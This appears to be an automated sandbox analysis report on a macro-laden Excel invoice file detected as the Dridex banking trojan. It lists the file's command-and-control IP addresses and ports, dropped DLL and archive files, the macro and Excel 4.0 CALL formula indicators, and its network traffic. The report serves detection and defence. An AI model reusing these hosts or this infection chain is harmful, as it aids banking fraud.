Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_003D39F9 InternetReadFile,

4_2_003D39F9

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2F82396A.emf

Jump to behavior

Source: regsvr32.exe, 00000004.00000002.2392732468.000000000050F000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: DWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000004.00000002.2392732468.000000000050F000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: media-server.skyinternet.com.pk

Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.dr	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 3C428B1A3E5F57D887EC4B864FAC5DCC.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Source: DWWIN.EXE, 00000007.00000002.2243113739.0000000003952000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238067186.0000000003973000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238067186.0000000003973000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238067186.0000000003973000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: DWWIN.EXE, 00000007.00000002.2243113739.0000000003952000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: DWWIN.EXE, 00000007.00000002.2243113739.0000000003952000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: DWWIN.EXE, 00000007.00000002.2238503044.00000000004A8000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.caby
Source: DWWIN.EXE, 00000007.00000002.2238488344.0000000000482000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enpw
Source: DWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: DWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: DWWIN.EXE, 00000007.00000002.2242807574.0000000003677000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: DWWIN.EXE, 00000007.00000002.2242807574.0000000003677000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238067186.0000000003973000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2243054454.0000000003900000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238067186.0000000003973000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2238527627.00000000004E9000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: DWWIN.EXE, 00000007.00000002.2243113739.0000000003952000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000004.00000002.2393787843.00000000020C0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2243298367.0000000003EA0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2392785990.0000000001DF0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2392840096.0000000001CC0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2238957386.0000000002310000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: DWWIN.EXE, 00000007.00000002.2242807574.0000000003677000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: DWWIN.EXE, 00000007.00000002.2242807574.0000000003677000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000004.00000002.2393787843.00000000020C0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2243298367.0000000003EA0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238067186.0000000003973000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: DWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: DWWIN.EXE, 00000007.00000002.2242807574.0000000003677000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: DWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: DWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: regsvr32.exe, 00000004.00000002.2392793966.000000000059C000.00000004.00000020.sdmp	String found in binary or memory: https://46.105.131.65:1512/
Source: regsvr32.exe, 00000004.00000002.2392793966.000000000059C000.00000004.00000020.sdmp	String found in binary or memory: https://46.105.131.65:1512/t
Source: regsvr32.exe, 00000004.00000002.2392793966.000000000059C000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2392699066.00000000004DF000.00000004.00000020.sdmp	String found in binary or memory: https://5.100.228.233:3389/
Source: regsvr32.exe, 00000004.00000002.2392699066.00000000004DF000.00000004.00000020.sdmp	String found in binary or memory: https://5.100.228.233:3389/7Q
Source: regsvr32.exe, 00000004.00000002.2392793966.000000000059C000.00000004.00000020.sdmp	String found in binary or memory: https://5.100.228.233:3389/T
Source: regsvr32.exe, 00000004.00000002.2392732468.000000000050F000.00000004.00000020.sdmp	String found in binary or memory: https://77.220.64.37/
Source: regsvr32.exe, 00000004.00000002.2392793966.000000000059C000.00000004.00000020.sdmp	String found in binary or memory: https://80.86.91.27:3308/
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238067186.0000000003973000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49348
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49226
Source: unknown	Network traffic detected: HTTP traffic on port 49288 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49344
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49222
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49186
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49340
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49182
Source: unknown	Network traffic detected: HTTP traffic on port 49336 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49256 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49388 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49218
Source: unknown	Network traffic detected: HTTP traffic on port 49380 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49336
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49214
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49332
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49210
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49296
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49292
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49392 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49316 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49276 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49368 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49404 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49360 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49328
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49206
Source: unknown	Network traffic detected: HTTP traffic on port 49292 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49324
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49202
Source: unknown	Network traffic detected: HTTP traffic on port 49324 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49288
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49320
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49284
Source: unknown	Network traffic detected: HTTP traffic on port 49202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49372 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49280
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49344 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49316
Source: unknown	Network traffic detected: HTTP traffic on port 49352 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49312
Source: unknown	Network traffic detected: HTTP traffic on port 49304 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49276
Source: unknown	Network traffic detected: HTTP traffic on port 49182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49396
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49272
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49392
Source: unknown	Network traffic detected: HTTP traffic on port 49222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49308
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49304
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49268
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49300
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49388
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49264
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49384
Source: unknown	Network traffic detected: HTTP traffic on port 49284 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49260
Source: unknown	Network traffic detected: HTTP traffic on port 49332 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49380
Source: unknown	Network traffic detected: HTTP traffic on port 49384 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49214 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49376
Source: unknown	Network traffic detected: HTTP traffic on port 49190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49252
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49372
Source: unknown	Network traffic detected: HTTP traffic on port 49396 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49198 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49400 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49312 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49272 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49408
Source: unknown	Network traffic detected: HTTP traffic on port 49364 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49404
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49248
Source: unknown	Network traffic detected: HTTP traffic on port 49376 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49368
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49400
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49244
Source: unknown	Network traffic detected: HTTP traffic on port 49296 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49364
Source: unknown	Network traffic detected: HTTP traffic on port 49408 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49240
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49360
Source: unknown	Network traffic detected: HTTP traffic on port 49248 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49340 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49308 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49348 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49268 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49236
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49356
Source: unknown	Network traffic detected: HTTP traffic on port 49186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49232
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49198
Source: unknown	Network traffic detected: HTTP traffic on port 49300 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49352
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49194
Source: unknown	Network traffic detected: HTTP traffic on port 49226 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49190
Source: unknown	Network traffic detected: HTTP traffic on port 49356 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49280 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49320 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49328 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49232 -> 443

Source: unknown	HTTPS traffic detected: 217.174.149.3:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49178 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49182 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49186 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49190 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49198 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49202 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49206 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49210 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49214 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49218 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49222 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49226 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49232 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49236 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49240 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49244 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49248 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49252 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49256 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49260 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49264 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49268 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49272 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49276 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49280 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49284 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49288 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49292 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49296 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49300 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49304 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49308 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49312 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49320 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49324 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49328 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49332 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49336 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49340 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49344 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49348 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49352 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49356 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49360 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49364 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49368 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49372 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49376 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49380 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49384 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49388 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49392 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49396 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49400 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49404 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49408 version: TLS 1.2

E-Banking Fraud:

Detected Dridex e-Banking trojan

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_003A5150 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,

4_2_003A5150

Source: C:\Windows\System32\DWWIN.EXE

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

Jump to dropped file

System Summary:

Document contains an embedded VBA macro which may execute processes

Show sources

Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")			Name: pagesREviewsd
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")			Name: pagesREviewsd

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: INV8222874744_20210111490395.xlsm	Initial sample: CALL
Source: INV8222874744_20210111490395.xlsm	Initial sample: CALL
Source: INV8222874744_20210111490395.xlsm	Initial sample: CALL
Source: INV8222874744_20210111490395.xlsm	Initial sample: CALL

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\bjcbglsw.dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hhsz1e0[1].rar			Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003B22A0 NtDelayExecution,	4_2_003B22A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003CBE30 NtClose,	4_2_003CBE30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0025B780 VirtualAlloc,VirtualAlloc,NtSetInformationProcess,	4_2_0025B780
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0025BA14 NtSetInformationProcess,	4_2_0025BA14

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003A5150	4_2_003A5150
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003BD030	4_2_003BD030
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003C1020	4_2_003C1020
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003C5CB0	4_2_003C5CB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003BE0A0	4_2_003BE0A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003CDCA0	4_2_003CDCA0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003C50A0	4_2_003C50A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003C4CA0	4_2_003C4CA0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003B98DA	4_2_003B98DA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003AACD0	4_2_003AACD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003BA0D0	4_2_003BA0D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003B88C0	4_2_003B88C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003B8CC0	4_2_003B8CC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003A1570	4_2_003A1570
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003B7564	4_2_003B7564
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003AF9A0	4_2_003AF9A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003BC590	4_2_003BC590
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003BD980	4_2_003BD980
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003CD180	4_2_003CD180
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003C89F0	4_2_003C89F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003C71F0	4_2_003C71F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003BFDD0	4_2_003BFDD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003C0220	4_2_003C0220
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003CD620	4_2_003CD620
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003ACA10	4_2_003ACA10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003CFA10	4_2_003CFA10
